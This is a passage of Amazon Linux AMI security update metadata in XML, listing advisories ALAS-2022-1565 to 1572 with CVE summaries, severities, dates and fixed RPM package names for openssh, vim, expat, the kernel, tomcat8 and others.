arch="i686"><filename>Packages/samba-python-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="ctdb" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="samba-client-libs" version="4.10.16" release="18.59.amzn1" epoch="0" 
arch="i686"><filename>Packages/samba-client-libs-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="samba-common-libs" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-libs-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="samba-winbind-clients" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-clients-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="libwbclient-devel" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-devel-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="samba-devel" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/samba-devel-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="libsmbclient-devel" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-devel-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="samba-test-libs" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-libs-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="samba-test" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="samba-debuginfo" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/samba-debuginfo-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="samba" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/samba-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="samba-winbind-modules" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-modules-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.10.16" release="18.59.amzn1" epoch="0" 
arch="i686"><filename>Packages/samba-winbind-krb5-locator-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="libsmbclient" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="samba-winbind" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="samba-common-tools" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-tools-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="samba-libs" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/samba-libs-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="samba-krb5-printing" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/samba-krb5-printing-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="samba-client" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="samba-python-test" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-test-4.10.16-18.59.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1565</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1565: medium priority package update for openssh</title><issued date="2022-02-10 22:00:00" /><updated date="2022-02-18 22:48:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-41617:
A flaw was found in OpenSSH. Helper programs for AuthorizedKeysCommand and AuthorizedPrincipalsCommand may run with privileges associated with group memberships of the sshd process, if the configuration specifies running the command as a different user. Depending on system configuration, inherited groups may allow AuthorizedKeysCommand/AuthorizedPrincipalsCommand helper programs to gain unintended privileges, potentially leading to local privilege escalation.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41617" title="" id="CVE-2021-41617" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssh-keycat" version="7.4p1" release="22.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-keycat-7.4p1-22.77.amzn1.x86_64.rpm</filename></package><package name="openssh-debuginfo" version="7.4p1" release="22.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-debuginfo-7.4p1-22.77.amzn1.x86_64.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.10.3" release="2.22.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam_ssh_agent_auth-0.10.3-2.22.77.amzn1.x86_64.rpm</filename></package><package name="openssh-cavs" version="7.4p1" release="22.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-cavs-7.4p1-22.77.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="7.4p1" release="22.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-clients-7.4p1-22.77.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="7.4p1" release="22.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-server-7.4p1-22.77.amzn1.x86_64.rpm</filename></package><package name="openssh-ldap" version="7.4p1" release="22.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-ldap-7.4p1-22.77.amzn1.x86_64.rpm</filename></package><package name="openssh" version="7.4p1" release="22.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-7.4p1-22.77.amzn1.x86_64.rpm</filename></package><package name="openssh-ldap" version="7.4p1" release="22.77.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-ldap-7.4p1-22.77.amzn1.i686.rpm</filename></package><package name="openssh-debuginfo" version="7.4p1" release="22.77.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-debuginfo-7.4p1-22.77.amzn1.i686.rpm</filename></package><package 
name="openssh" version="7.4p1" release="22.77.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-7.4p1-22.77.amzn1.i686.rpm</filename></package><package name="openssh-keycat" version="7.4p1" release="22.77.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-keycat-7.4p1-22.77.amzn1.i686.rpm</filename></package><package name="openssh-clients" version="7.4p1" release="22.77.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-clients-7.4p1-22.77.amzn1.i686.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.10.3" release="2.22.77.amzn1" epoch="0" arch="i686"><filename>Packages/pam_ssh_agent_auth-0.10.3-2.22.77.amzn1.i686.rpm</filename></package><package name="openssh-cavs" version="7.4p1" release="22.77.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-cavs-7.4p1-22.77.amzn1.i686.rpm</filename></package><package name="openssh-server" version="7.4p1" release="22.77.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-server-7.4p1-22.77.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1566</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1566: critical priority package update for perl-Image-ExifTool</title><issued date="2022-02-17 18:30:00" /><updated date="2022-02-18 22:52:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-23935:
lib/Image/ExifTool.pm in ExifTool before 12.38 mishandles a $file =~ /\|$/ check.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23935" title="" id="CVE-2022-23935" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perl-Image-ExifTool" version="12.38" release="1.3.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Image-ExifTool-12.38-1.3.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1567</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1567: medium priority package update for vim</title><issued date="2022-02-17 18:34:00" /><updated date="2024-02-14 20:03:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-0359:
A flaw was found in vim. The vulnerability occurs due to Illegal memory access with large tabstop in Ex mode, which can lead to a heap buffer overflow. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-0351:
A flaw was found in vim. The vulnerability occurs due to excessive recursion, which can lead to a segmentation fault. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-0318:
A flaw was found in vim. The vulnerability occurs due to reading beyond the end of a line in the utf_head_off function, which can lead to a heap buffer overflow. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-0261:
A heap-based out-of-bounds write flaw was found in vim's ops.c. This flaw allows an attacker who tricks a user into opening a crafted file to trigger an out-of-bounds write, which can crash the software, modify memory, and possibly lead to code execution.
CVE-2022-0213:
A flaw was found in vim. The vulnerability occurs due to not checking the length for the NameBuff function, which can lead to a heap buffer overflow. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-0158:
It was found that vim was vulnerable to a 1 byte heap based out of bounds read flaw in the `compile_get_env()` function. A file could use that flaw to disclose 1 byte of vim's internal memory.
CVE-2022-0156:
It was found that vim was vulnerable to use-after-free flaw in the way it was treating allocated lines in user functions. A specially crafted file could crash the vim process or possibly lead to other undefined behaviors.
CVE-2021-3875:
There's an out-of-bounds read flaw in Vim's ex_docmd.c. An attacker who is capable of tricking a user into opening a specially crafted file could trigger an out-of-bounds read on a memmove operation, potentially causing an impact to application availability.
CVE-2021-3872:
An out-of-bounds write flaw was found in vim's drawscreen.c win_redr_status() function. This flaw allows an attacker to trick a user to open a crafted file with specific arguments in vim, triggering an out-of-bounds write. The highest threat from this vulnerability is to confidentiality, integrity, and system availability.
CVE-2021-3778:
A flaw was found in vim. A possible heap-based buffer overflow could allow an attacker to input a specially crafted file leading to a crash or code execution. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3778" title="" id="CVE-2021-3778" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3872" title="" id="CVE-2021-3872" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3875" title="" id="CVE-2021-3875" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0156" title="" id="CVE-2022-0156" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0158" title="" id="CVE-2022-0158" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0213" title="" id="CVE-2022-0213" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0261" title="" id="CVE-2022-0261" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0318" title="" id="CVE-2022-0318" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0351" title="" id="CVE-2022-0351" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0359" title="" id="CVE-2022-0359" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="vim-common" version="8.2.4314" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-common-8.2.4314-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-filesystem" version="8.2.4314" release="1.1.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-filesystem-8.2.4314-1.1.amzn1.noarch.rpm</filename></package><package name="vim-data" version="8.2.4314" release="1.1.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-data-8.2.4314-1.1.amzn1.noarch.rpm</filename></package><package name="vim-enhanced" version="8.2.4314" release="1.1.amzn1" epoch="2" 
arch="x86_64"><filename>Packages/vim-enhanced-8.2.4314-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-minimal" version="8.2.4314" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-minimal-8.2.4314-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-debuginfo" version="8.2.4314" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-debuginfo-8.2.4314-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-minimal" version="8.2.4314" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-minimal-8.2.4314-1.1.amzn1.i686.rpm</filename></package><package name="vim-enhanced" version="8.2.4314" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-enhanced-8.2.4314-1.1.amzn1.i686.rpm</filename></package><package name="vim-common" version="8.2.4314" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-common-8.2.4314-1.1.amzn1.i686.rpm</filename></package><package name="vim-debuginfo" version="8.2.4314" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-debuginfo-8.2.4314-1.1.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1568</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1568: medium priority package update for containerd</title><issued date="2022-03-01 18:04:00" /><updated date="2022-03-04 21:16:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-23648:
A bug was found in containerd where containers launched through containerd's CRI implementation with a specially-crafted image configuration could gain access to read-only copies of arbitrary files and directories on the host. This may bypass any policy-based enforcement on container setup (including a Kubernetes Pod Security Policy) and expose potentially sensitive information. Kubernetes and crictl can both be configured to use containerd's CRI implementation.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23648" title="" id="CVE-2022-23648" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="containerd-debuginfo" version="1.4.6" release="8.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-debuginfo-1.4.6-8.12.amzn1.x86_64.rpm</filename></package><package name="containerd" version="1.4.6" release="8.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-1.4.6-8.12.amzn1.x86_64.rpm</filename></package><package name="containerd-stress" version="1.4.6" release="8.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-stress-1.4.6-8.12.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1569</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1569: medium priority package update for expat</title><issued date="2022-03-01 18:04:00" /><updated date="2022-03-04 21:17:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-23852:
expat (libexpat) is susceptible to a software flaw that causes process interruption. When a large number of prefixed XML attributes on a single tag are processed, libexpat can terminate unexpectedly due to an integer overflow. The highest threat from this vulnerability is to availability, confidentiality and integrity.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23852" title="" id="CVE-2022-23852" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="expat" version="2.1.0" release="12.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-2.1.0-12.25.amzn1.x86_64.rpm</filename></package><package name="expat-devel" version="2.1.0" release="12.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-devel-2.1.0-12.25.amzn1.x86_64.rpm</filename></package><package name="expat-debuginfo" version="2.1.0" release="12.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-debuginfo-2.1.0-12.25.amzn1.x86_64.rpm</filename></package><package name="expat" version="2.1.0" release="12.25.amzn1" epoch="0" arch="i686"><filename>Packages/expat-2.1.0-12.25.amzn1.i686.rpm</filename></package><package name="expat-devel" version="2.1.0" release="12.25.amzn1" epoch="0" arch="i686"><filename>Packages/expat-devel-2.1.0-12.25.amzn1.i686.rpm</filename></package><package name="expat-debuginfo" version="2.1.0" release="12.25.amzn1" epoch="0" arch="i686"><filename>Packages/expat-debuginfo-2.1.0-12.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1570</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1570: important priority package update for expat</title><issued date="2022-03-07 23:17:00" /><updated date="2022-03-08 18:54:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-25315:
An integer overflow was found in expat. The issue occurs in storeRawNames() by abusing the m_buffer expansion logic to allow allocations very close to INT_MAX and out-of-bounds heap writes. This flaw can cause a denial of service or potentially arbitrary code execution.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25315" title="" id="CVE-2022-25315" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="expat-debuginfo" version="2.1.0" release="12.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-debuginfo-2.1.0-12.26.amzn1.x86_64.rpm</filename></package><package name="expat-devel" version="2.1.0" release="12.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-devel-2.1.0-12.26.amzn1.x86_64.rpm</filename></package><package name="expat" version="2.1.0" release="12.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-2.1.0-12.26.amzn1.x86_64.rpm</filename></package><package name="expat-debuginfo" version="2.1.0" release="12.26.amzn1" epoch="0" arch="i686"><filename>Packages/expat-debuginfo-2.1.0-12.26.amzn1.i686.rpm</filename></package><package name="expat-devel" version="2.1.0" release="12.26.amzn1" epoch="0" arch="i686"><filename>Packages/expat-devel-2.1.0-12.26.amzn1.i686.rpm</filename></package><package name="expat" version="2.1.0" release="12.26.amzn1" epoch="0" arch="i686"><filename>Packages/expat-2.1.0-12.26.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1571</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1571: important priority package update for kernel</title><issued date="2022-03-07 23:19:00" /><updated date="2022-05-23 21:59:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-24448:
A flaw was found in the Linux kernel. When an application tries to open a directory (using the O_DIRECTORY flag) in a mounted NFS filesystem, a lookup operation is performed. If the NFS server returns a file as a result of the lookup, the NFS filesystem returns an uninitialized file descriptor instead of the expected ENOTDIR value. This flaw leaks kernel data into userspace.
CVE-2022-23960:
The Amazon Linux kernel now enables, by default, a software mitigation for this issue, on all ARM-based EC2 instance types.
CVE-2022-0617:
A NULL pointer dereference was found in the Linux kernel's UDF file system functionality in the way the user triggers the udf_file_write_iter function for a malicious UDF image. This flaw allows a local user to crash the system.
CVE-2022-0435:
A stack overflow flaw was found in the Linux kernel's TIPC protocol functionality in the way a user sends a packet with malicious content where the number of domain member nodes is higher than the 64 allowed. This flaw allows a remote user to crash the system or possibly escalate their privileges if they have access to the TIPC network.
CVE-2022-0330:
A random memory access flaw was found in the Linux kernel's GPU i915 kernel driver functionality in the way a user may run malicious code on the GPU. This flaw allows a local user to crash the system or escalate their privileges on the system.
CVE-2022-0002:
Non-transparent sharing of branch predictor within a context in some Intel(r) Processors may allow an authorized user to potentially enable information disclosure via local access.
CVE-2022-0001:
Non-transparent sharing of branch predictor selectors between contexts in some Intel(R) Processors may allow an authorized user to potentially enable information disclosure.
CVE-2021-4197:
An unprivileged write to the file handler flaw was found in the Linux kernel's control groups and namespaces subsystem, in the way users can access some less privileged processes that are controlled by cgroups and have a higher privileged parent process. This applies to both the cgroup2 and cgroup1 versions of control groups. A local user could use this flaw to crash the system or escalate their privileges on the system.
CVE-2021-38199:
A flaw was found in the hanging of mounts in the Linux kernel's NFS4 subsystem where remote servers are unreachable for the client during migration of data from one server to another (during trunking detection). This flaw allows a remote NFS4 server (if the client is connected) to starve the resources, causing a denial of service. The highest threat from this vulnerability is to system availability.
CVE-2021-26401:
AMD recommends using a software mitigation for this issue, which the kernel is enabling by default. The Linux kernel will use the generic retpoline software mitigation, instead of the specialized AMD one, on AMD instances (*5a*). This is done by default, and no administrator action is needed.
CVE-2021-26341:
AMD recommends using a software mitigation for this issue, which the kernel is enabling by default. The Linux kernel will use the generic retpoline software mitigation, instead of the specialized AMD one, on AMD instances (*5a*). This is done by default, and no administrator action is needed.
CVE-2020-36322:
A denial of service flaw was found in fuse_do_getattr in fs/fuse/dir.c in the kernel side of the FUSE filesystem in the Linux kernel. A local user could use this flaw to crash the system.
CVE-2018-25020:
A buffer overflow flaw in the Linux kernel BPF subsystem was found in the way users run BPF with long jump over an instruction sequence where inner instructions require substantial expansions into multiple BPF instructions. A local user could use this flaw to crash the system or escalate their privileges on the system.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25020" title="" id="CVE-2018-25020" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36322" title="" id="CVE-2020-36322" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26341" title="" id="CVE-2021-26341" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26401" title="" id="CVE-2021-26401" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38199" title="" id="CVE-2021-38199" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4197" title="" id="CVE-2021-4197" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0001" title="" id="CVE-2022-0001" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0002" title="" id="CVE-2022-0002" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0330" title="" id="CVE-2022-0330" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0435" title="" id="CVE-2022-0435" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0617" title="" id="CVE-2022-0617" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23960" title="" id="CVE-2022-23960" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24448" title="" id="CVE-2022-24448" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="4.14.268" release="139.500.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.268-139.500.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.268" release="139.500.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-headers-4.14.268-139.500.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.268" release="139.500.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.268-139.500.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.268" release="139.500.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.268-139.500.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.268" release="139.500.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.268-139.500.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.268" release="139.500.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.268-139.500.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.268" release="139.500.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.268-139.500.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.268" release="139.500.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.268-139.500.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.268" release="139.500.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.268-139.500.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.268" release="139.500.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.268-139.500.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.268" release="139.500.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.268-139.500.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.268" release="139.500.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.268-139.500.amzn1.i686.rpm</filename></package><package name="kernel-devel" 
version="4.14.268" release="139.500.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.268-139.500.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.268" release="139.500.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.268-139.500.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.268" release="139.500.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.268-139.500.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.268" release="139.500.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.268-139.500.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.268" release="139.500.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.268-139.500.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.268" release="139.500.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.268-139.500.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.268" release="139.500.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.268-139.500.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.268" release="139.500.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.268-139.500.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1572</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1572: medium priority package update for tomcat8</title><issued date="2022-03-07 23:20:00" /><updated date="2022-03-08 18:54:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-23181:
The fix for bug CVE-2020-9484 introduced a time of check, time of use vulnerability into Apache Tomcat 10.1.0-M1 to 10.1.0-M8, 10.0.0-M5 to 10.0.14, 9.0.35 to 9.0.56 and 8.5.55 to 8.5.73 that allowed a local attacker to perform actions with the privileges of the user that the Tomcat process is using. This issue is only exploitable when Tomcat is configured to persist sessions using the FileStore.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23181" title="" id="CVE-2022-23181" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-log4j" version="8.5.75" release="1.90.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.75-1.90.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.5.75" release="1.90.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.75-1.90.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.75" release="1.90.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.75-1.90.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.5.75" release="1.90.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.75-1.90.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.75" release="1.90.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.75-1.90.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.75" release="1.90.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.75-1.90.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.75" release="1.90.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.75-1.90.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.75" release="1.90.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.75-1.90.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.75" release="1.90.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.75-1.90.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.75" release="1.90.amzn1" epoch="0" 
